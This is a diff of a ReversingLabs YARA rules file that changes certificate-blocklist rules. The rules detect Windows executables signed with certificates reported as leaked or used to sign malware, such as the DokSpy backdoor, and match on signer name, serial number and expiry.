+		id = "3581085c-a6e7-571f-8253-f8d9e90e78fc"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8150-L8166"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2158-L2174"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5c64f8e40c31822ce8d2e34f96ccc977085e429f0c068a5f6b44099117837de1"
+		logic_hash = "8552ce9e9ab8d6b1025ab3c6e7b2485ef855236114c426475fde0b5f2e231ec9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18197,21 +40591,21 @@ rule REVERSINGLABS_Cert_Blocklist_3Cee26C125B8C188F316C3Fa78D9C2F1 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bitubit LLC" and pe.signatures [ i ] . serial == "3c:ee:26:c1:25:b8:c1:88:f3:16:c3:fa:78:d9:c2:f1" and 1606435200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Developer ID Application: Edouard Roulet (W7J9LRHXTG)" and pe.signatures [ i ] . serial == "12:72:51:b3:2b:9a:50:bd" and 1493769599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4C687A0022C36F89E253F91D1F6954E2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_48Cad4E6966E22D6 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing OSX DokSpy backdoor."
 		author = "ReversingLabs"
-		id = "c45a2125-dd7c-5ff1-89a8-35cbe1d924d7"
+		id = "22d62d7e-3f76-5f6b-a3f1-a6b087fb63e2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8168-L8184"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2176-L2192"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "287c0c7a25e33e0e7def6efa23dbd2efba7c4ac3aa8f5deb8568a60a95e08bbe"
+		logic_hash = "7733b8a97d9f3538db04309a2e3f9df6cb64930b0b6f7f241c3e629be2dd7804"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18221,21 +40615,21 @@ rule REVERSINGLABS_Cert_Blocklist_4C687A0022C36F89E253F91D1F6954E2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HETCO ApS" and pe.signatures [ i ] . serial == "4c:68:7a:00:22:c3:6f:89:e2:53:f9:1d:1f:69:54:e2" and 1606780800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Developer ID Application: Seven Muller (FUP9692NN6)" and pe.signatures [ i ] . serial == "48:ca:d4:e6:96:6e:22:d6" and 1492732799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ca646B4275406Df639Cf603756F63D77 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5E15205F180442Cc6C3C0F03E1A33D9F : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "b176b7f8-e3d1-593c-91c3-03e781f6ef7b"
+		id = "4a0d995a-37df-52a4-a66f-4bc6c290c10a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8186-L8204"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2194-L2210"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a690e3f6a656835984e47d999271fe441a5fbf424208da8d5b3c9ddcef47b70e"
+		logic_hash = "1ca238b5da4ff9940425c99f55542c931ccdf0ea3b0a2acbf00ffbbb54171ae0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18245,21 +40639,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ca646B4275406Df639Cf603756F63D77 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHOECORP LIMITED" and ( pe.signatures [ i ] . serial == "00:ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" or pe.signatures [ i ] . serial == "ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" ) and 1605830400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ziber Ltd" and pe.signatures [ i ] . serial == "5e:15:20:5f:18:04:42:cc:6c:3c:0f:03:e1:a3:3d:9f" and 1498607999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Addbec454B5479Cabd940A72Df4500Af : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4C8E3B1613F73542F7106F272094Eb23 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "f2488d44-5a9a-5ab6-be6f-f3444f72444a"
+		id = "06f79efe-134e-5941-80fe-3b6482ac9668"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8206-L8224"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2212-L2228"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "799629791646c524d170b900339b87474aed73b7156a8c4dd20f7c13cbe97929"
+		logic_hash = "15c21b783409d904a0b4971dbdcbd0740083d13f3c633ee77c87df46d3aca748"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18269,21 +40663,21 @@ rule REVERSINGLABS_Cert_Blocklist_Addbec454B5479Cabd940A72Df4500Af : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHAT LIMITED" and ( pe.signatures [ i ] . serial == "00:ad:db:ec:45:4b:54:79:ca:bd:94:0a:72:df:45:00:af" or pe.signatures [ i ] . serial == "ad:db:ec:45:4b:54:79:ca:bd:94:0a:72:df:45:00:af" ) and 1612828800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADD Audit" and pe.signatures [ i ] . serial == "4c:8e:3b:16:13:f7:35:42:f7:10:6f:27:20:94:eb:23" and 1472687999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ac307E5257Bb814B818D3633B630326F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2Ce2Bd0Ad3Cfde9Ea73Eec7Ca30400Da : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "c33d798a-854c-5fab-afbe-e94d142befa7"
+		id = "b7439b38-c8b7-5dcb-8d10-952862ce3465"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8226-L8244"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2230-L2246"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "10819bd2194fface6db812f8c6770c306c183386d2d9ba97467a5b55fd997194"
+		logic_hash = "a879ecd957acd29e8a5bad6c97cd10453ab857949680b522735bd77eb561d2ee"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18293,21 +40687,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ac307E5257Bb814B818D3633B630326F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aqua Direct s.r.o." and ( pe.signatures [ i ] . serial == "00:ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f" or pe.signatures [ i ] . serial == "ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f" ) and 1606089600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Media Lid" and pe.signatures [ i ] . serial == "2c:e2:bd:0a:d3:cf:de:9e:a7:3e:ec:7c:a3:04:00:da" and 1493337599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0D83E7F47189Cdbfc7Fa3E5F58882329 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Fbc30Db127A536C34D7A0Fa81B48193 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "d6bda332-06fc-5b1a-99fb-fc9578dc5326"
+		id = "c755a6c1-e113-5513-9a61-87bf6d7dcb3e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8246-L8262"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2248-L2264"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b344f9fd6d8378b7d77a34b14c5f37eea253f3d13a8eb0777925f195fb3cf502"
+		logic_hash = "6b109b5636aa297a6e07f9d9213f7f07a7767b58442d03dc2f34f8a9b3eaba2b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18317,21 +40711,21 @@ rule REVERSINGLABS_Cert_Blocklist_0D83E7F47189Cdbfc7Fa3E5F58882329 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "0d:83:e7:f4:71:89:cd:bf:c7:fa:3e:5f:58:88:23:29" and 1605830400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Megabit, OOO" and pe.signatures [ i ] . serial == "0f:bc:30:db:12:7a:53:6c:34:d7:a0:fa:81:b4:81:93" and 1466121599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_58Aa64564A50E8B2D6E31D5Cd6250Fde : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_08448Bd6Ee9105Ae31228Ea5Fe496F63 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "00e096f6-2955-5936-9a75-f537c2da3621"
+		id = "489ffe25-43cf-55b6-b249-17d251b9774e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8264-L8280"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2266-L2282"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f6b50ebf707b67650fe832d81c6fe8d2411cd83432ef94432d181db0c29aa48b"
+		logic_hash = "9bc044b4fdf381274a2c31bc997dcdfd553595d92de7b33dc472353a00011711"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18341,21 +40735,21 @@ rule REVERSINGLABS_Cert_Blocklist_58Aa64564A50E8B2D6E31D5Cd6250Fde : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foreground" and pe.signatures [ i ] . serial == "58:aa:64:56:4a:50:e8:b2:d6:e3:1d:5c:d6:25:0f:de" and 1609002028 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Raffaele Carnacina" and pe.signatures [ i ] . serial == "08:44:8b:d6:ee:91:05:ae:31:22:8e:a5:fe:49:6f:63" and 1445212799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2Aa0Ae245B487C8926C88Ee6D736D1Ca : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_02F17566Ef568Dc06C9A379Ea2F4Faea : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "d2d61fd7-2392-5d75-9c5b-4e4fddfc7a83"
+		id = "a14e16ff-844c-53ff-9297-8760265da747"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8282-L8298"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2284-L2300"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5a362175600552983ae838ca18aa378dc748b8b68bd8b67a9387794d983ed1a2"
+		logic_hash = "e3ec8a6de817354862880301e78a999f45f02c2fa8512bba6d27c9776f1a3417"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18365,21 +40759,21 @@ rule REVERSINGLABS_Cert_Blocklist_2Aa0Ae245B487C8926C88Ee6D736D1Ca : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PILOTE SPRL" and pe.signatures [ i ] . serial == "2a:a0:ae:24:5b:48:7c:89:26:c8:8e:e6:d7:36:d1:ca" and 1612262280 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALERIANO BEDESCHI" and pe.signatures [ i ] . serial == "02:f1:75:66:ef:56:8d:c0:6c:9a:37:9e:a2:f4:fa:ea" and 1441324799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Aec3D3F752A38617C1D7A677D0B5591 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7D824Ba1F7F730319C50D64C9A7Ed507 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "02f2bf36-e573-502c-8ecc-843a6e627c2b"
+		id = "4372aea7-a25b-5211-befd-9e0bcfb09199"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8300-L8316"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2302-L2318"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b299833a19944ca6943ba9c974ec95369c57cd61acc8b2e1b5310edd077762c2"
+		logic_hash = "407611603974c910d9a6a0ed71ecdf54ddcc59abb0f48c60846e61d6d4191933"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18389,21 +40783,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Aec3D3F752A38617C1D7A677D0B5591 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SILVER d.o.o." and pe.signatures [ i ] . serial == "1a:ec:3d:3f:75:2a:38:61:7c:1d:7a:67:7d:0b:55:91" and 1611705600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "joaweb" and pe.signatures [ i ] . serial == "7d:82:4b:a1:f7:f7:30:31:9c:50:d6:4c:9a:7e:d5:07" and 1238025599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A7E1Dc5352C3852C5523030F57F2425C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_77A64759F12766E363D779998C71Bdc9 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a2795796-2897-55ad-936c-456c3b93bf14"
+		id = "98acd01b-c452-530d-8814-2591810ecd53"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8318-L8336"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2320-L2336"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "79c42c9a4eeeb69a62a16590e2b0b63818785509a40d543c7efe27ec6baaa19e"
+		logic_hash = "2bf3d99ddec6b76da1ca60a9285767a5b34b84455db58195fc5d8fd8a22c9f8a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18413,21 +40807,21 @@ rule REVERSINGLABS_Cert_Blocklist_A7E1Dc5352C3852C5523030F57F2425C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pushka LLC" and ( pe.signatures [ i ] . serial == "00:a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c" or pe.signatures [ i ] . serial == "a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c" ) and 1611792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Gigabit Times Technology Co., Ltd" and pe.signatures [ i ] . serial == "77:a6:47:59:f1:27:66:e3:63:d7:79:99:8c:71:bd:c9" and 1301011199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Bbd4Dc3768A51Aa2B3059C1Bad569276 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0B0D17Ec1449B4B2D38Fcb0F20Fbcd3A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ee861c79-fea2-5931-873d-b76e5bdef593"
+		id = "4484b00d-8fad-5f8f-9030-67216f2820a3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8338-L8356"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2338-L2354"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f336570834e0663c6e589fa22b3541f4f79c40ff945dd91f1fd1258a96adeceb"
+		logic_hash = "3121f2c49d0d4c396023924521f2c980045b6f07d082e49447429e9cd640e0ef"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18437,21 +40831,21 @@ rule REVERSINGLABS_Cert_Blocklist_Bbd4Dc3768A51Aa2B3059C1Bad569276 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JJ ELECTRICAL SERVICES LIMITED" and ( pe.signatures [ i ] . serial == "00:bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76" or pe.signatures [ i ] . serial == "bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76" ) and 1607472000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WEBPIC DESENVOLVIMENTO DE SOFTWARE LTDA" and pe.signatures [ i ] . serial == "0b:0d:17:ec:14:49:b4:b2:d3:8f:cb:0f:20:fb:cd:3a" and 1394150399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_08622B9Dd9D78E67678Ecc21E026522E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fe9404Dc73Cf1C2Ba1450B8398305557 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "66d942c7-ceb9-54e5-bccc-1adf641fd70e"
+		id = "17700719-81ea-58d4-87f5-4d5c1b19bf64"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8358-L8374"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2356-L2374"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "09507b09b035195b74434f56041588f67245fa097183228dffc612bb4901825b"
+		logic_hash = "c0132d71de1384f6e534dd154eba88c4a51c43b7dfe984f3064ba4feffa4dd5a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18461,21 +40855,21 @@ rule REVERSINGLABS_Cert_Blocklist_08622B9Dd9D78E67678Ecc21E026522E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kayak Republic af 2015 APS" and pe.signatures [ i ] . serial == "08:62:2b:9d:d9:d7:8e:67:67:8e:cc:21:e0:26:52:2e" and 1611619200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8E\\xA6\\xE9\\x97\\xA8\\xE7\\xBF\\x94\\xE9\\x80\\x9A\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE5\\x88\\x86\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:fe:94:04:dc:73:cf:1c:2b:a1:45:0b:83:98:30:55:57" or pe.signatures [ i ] . serial == "fe:94:04:dc:73:cf:1c:2b:a1:45:0b:83:98:30:55:57" ) and 1287360000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E69A6De0074Ece38C2F30F0D4A808456 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Cb2D523A6Bf7A066642C578De1C9Be4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "17571f1e-1dce-5216-8f45-467e5d77ccf1"
+		id = "d2c87c29-cb64-5d43-847b-64c888421c1f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8376-L8394"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2376-L2392"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "21d8641d2394120847044f0e6f4d868095a1e30c0b594a3d045877ab9b3808a1"
+		logic_hash = "5a786b9ade5a59b8a1e0bbef1eb3dcb65404dcee19d572dc60f9ec9f45e4755b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18485,21 +40879,21 @@ rule REVERSINGLABS_Cert_Blocklist_E69A6De0074Ece38C2F30F0D4A808456 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Semantic" and ( pe.signatures [ i ] . serial == "00:e6:9a:6d:e0:07:4e:ce:38:c2:f3:0f:0d:4a:80:84:56" or pe.signatures [ i ] . serial == "e6:9a:6d:e0:07:4e:ce:38:c2:f3:0f:0d:4a:80:84:56" ) and 1611532800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Hua\\xE2\\x80\\x99nan Xingfa Electronic Equipment Firm" and pe.signatures [ i ] . serial == "1c:b2:d5:23:a6:bf:7a:06:66:42:c5:78:de:1c:9b:e4" and 1400889599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_8385684419Ab26A3F2640B1496E1Fe94 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3A6Ccabb1C62F3Be3Eb03869Fa43Dc4A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "03e861a0-156e-5366-a312-dc2aa73b0393"
+		id = "b16f7bb7-88fe-5f8f-9592-8d309f556419"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8396-L8414"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2394-L2410"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "24f75badc335160a8053a4c7e8bbd8ddbd3266c3a18059a937d5989df97ae9d9"
